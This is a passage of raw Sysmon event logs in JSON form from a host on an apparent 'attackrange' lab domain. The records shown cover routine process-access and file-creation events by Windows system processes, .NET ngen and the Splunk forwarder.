indows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101D120C00}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101D120C00}","TargetProcessId":"672","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:42.523\r\nProcessGuid: {41C8662E-2255-5F25-0000-0010998F0D00}\r\nProcessId: 4700\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\PresentationBuildTasks.dll\r\nCreationUtcTime: 2020-08-01 08:05:42.523","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:42.523","ProcessGuid":"{41C8662E-2255-5F25-0000-0010998F0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\PresentationBuildTasks.dll","CreationUtcTime":"2020-08-01 08:05:42.523","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.585\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001048D60C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.585","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001048D60C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.585\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001048D60C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.585","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001048D60C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001048D60C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001048D60C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.648\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-00101B990D00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.648","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-00101B990D00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.648\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-00101B990D00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.648","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-00101B990D00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
